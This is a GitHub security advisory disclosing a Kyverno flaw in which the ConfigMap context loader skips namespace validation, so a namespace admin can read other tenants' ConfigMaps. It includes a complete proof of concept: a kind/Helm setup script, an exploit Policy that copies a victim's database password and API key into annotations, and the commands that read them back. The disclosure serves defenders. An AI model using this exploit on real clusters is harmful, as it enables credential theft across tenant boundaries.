Skip to content

Kyverno: Cross-Namespace Read Bypasses RBAC Isolation (CVE-2026-22039 Incomplete Fix)

High severity GitHub Reviewed Published Apr 15, 2026 in kyverno/kyverno • Updated Apr 24, 2026

Package

gomod github.com/kyverno/kyverno (Go)

Affected versions

<= 1.17.1

Patched versions

None

Description

Summary

CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's apiCall context by validating the URLPath field. However, the ConfigMap context loader has the identical vulnerability — the configMap.namespace field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters.

Details

Root cause: The CVE-2026-22039 fix in pkg/engine/apicall/apiCall.go (lines 73-83) validates that URLPath references only the policy's own namespace using regex. However, the ConfigMap context loader at pkg/engine/context/loaders/configmap.go performs no namespace validation on the namespace field.

Code path comparison:

CVE-2026-22039 (fixed) This vulnerability (unfixed)
Location apiCall.URLPath field configMap.namespace field
Code path apicall.Fetch() → namespace regex validation configmap.NewConfigMapLoader() → no validation
Root cause Variable substitution + missing validation Same pattern, still unpatched

Exploit mechanism:

  1. Namespace admin creates a Kyverno Policy in their namespace (standard RBAC)
  2. Policy uses context.configMap.namespace: "victim-ns" to reference another namespace
  3. Kyverno's admission controller service account (has cluster-wide view role) fetches the ConfigMap
  4. Policy mutates a trigger ConfigMap to exfiltrate the stolen data via annotations

Affected code: pkg/engine/context/loaders/configmap.go - NewConfigMapLoader() does not validate resolved namespace against policy namespace.

PoC

Full reproduction (5 minutes on kind):

#!/bin/bash
# Setup: kind cluster + Kyverno v1.17.0
kind create cluster --name kyverno-poc --wait 60s
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno --namespace kyverno --create-namespace --version 3.7.0 --wait

# Create attacker and victim namespaces
kubectl create namespace attacker-ns
kubectl create namespace victim-ns

# Plant sensitive data in victim namespace
kubectl create configmap sensitive-config -n victim-ns \
    --from-literal=db-password="s3cr3t-p4ssw0rd" \
    --from-literal=api-key="AKIAIOSFODNN7EXAMPLE"

# Create namespace admin RBAC (standard multi-tenant setup)
kubectl create serviceaccount ns-admin -n attacker-ns
kubectl create rolebinding ns-admin-binding --clusterrole=admin \
    --serviceaccount=attacker-ns:ns-admin --namespace=attacker-ns
kubectl create role kyverno-policy-creator --verb=create,get,list \
    --resource=policies.kyverno.io --namespace=attacker-ns
kubectl create rolebinding kyverno-policy-binding --role=kyverno-policy-creator \
    --serviceaccount=attacker-ns:ns-admin --namespace=attacker-ns

# Verify namespace admin CANNOT directly access victim-ns
kubectl get configmap sensitive-config -n victim-ns \
    --as=system:serviceaccount:attacker-ns:ns-admin
# Error: Forbidden (expected)

Exploit policy:

# Apply as namespace admin
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: configmap-crossns-read
  namespace: attacker-ns
spec:
  rules:
  - name: steal-configmap
    match:
      any:
      - resources:
          kinds: [ConfigMap]
          names: ["trigger-cm"]
    context:
    - name: stolendata
      configMap:
        name: "sensitive-config"
        namespace: "victim-ns"    # <-- NO VALIDATION
    mutate:
      patchStrategicMerge:
        metadata:
          annotations:
            exfil-db-password: "{{ stolendata.data.\"db-password\" }}"
            exfil-api-key: "{{ stolendata.data.\"api-key\" }}"

Trigger and exfiltrate:

# Trigger policy (as namespace admin)
kubectl apply -f - <<EOF
apiVersion: v1
kind: ConfigMap
metadata:
  name: trigger-cm
  namespace: attacker-ns
data:
  innocent: "data"
EOF

# Read exfiltrated secrets
kubectl get configmap trigger-cm -n attacker-ns -o jsonpath='{.metadata.annotations}' \
    --as=system:serviceaccount:attacker-ns:ns-admin | python3 -m json.tool
# Output:
# {
#     "exfil-api-key": "AKIAIOSFODNN7EXAMPLE",
#     "exfil-db-password": "s3cr3t-p4ssw0rd"
# }

Result: Namespace admin successfully read secrets from victim-ns despite having NO RBAC access.

Impact

Severity: HIGH (CVSS 7.7)

Who is affected:

  • Any Kubernetes cluster running Kyverno v1.17.0 (and earlier) with namespace-scoped Policy creation enabled (default)
  • Multi-tenant clusters where ConfigMaps contain sensitive data
  • Azure Kubernetes Service (AKS) and other managed K8s using Kyverno

Attack prerequisites:

  • Namespace admin privileges (standard RBAC in multi-tenant clusters)
  • Ability to create Kyverno Policy resources (default for namespace admins)
  • No cluster-admin required

What can be exfiltrated:

  • Any ConfigMap from any namespace
  • Common targets: database credentials, API keys, service configurations, application secrets stored in ConfigMaps

Why this matters:

  • Namespace isolation is a fundamental Kubernetes security boundary
  • Namespace admin is an expected, common RBAC level in production multi-tenant clusters
  • Violates the principle of least privilege and breaks multi-tenancy guarantees

Suggested fix:
Apply the same namespace validation from apicall.Fetch() to configmap.NewConfigMapLoader():

  1. Pass policyNamespace to NewConfigMapLoader()
  2. After variable substitution on namespace, validate resolved namespace == policyNamespace
  3. Return error if validation fails

Also audit other context loaders (globalReference, imageRegistry, variable) for the same pattern.

Tested versions:

  • Kyverno: v1.17.0 (latest, includes CVE-2026-22039 fix)
  • Helm chart: 3.7.0
  • Kubernetes: v1.35.0 (kind)

References

@JimBugwadia JimBugwadia published to kyverno/kyverno Apr 15, 2026
Published to the GitHub Advisory Database Apr 16, 2026
Reviewed Apr 16, 2026
Published by the National Vulnerability Database Apr 24, 2026
Last updated Apr 24, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(12th percentile)

Weaknesses

Incorrect Authorization

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. Learn more on MITRE.

CVE ID

CVE-2026-41068

GHSA ID

GHSA-cvq5-hhx3-f99p

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.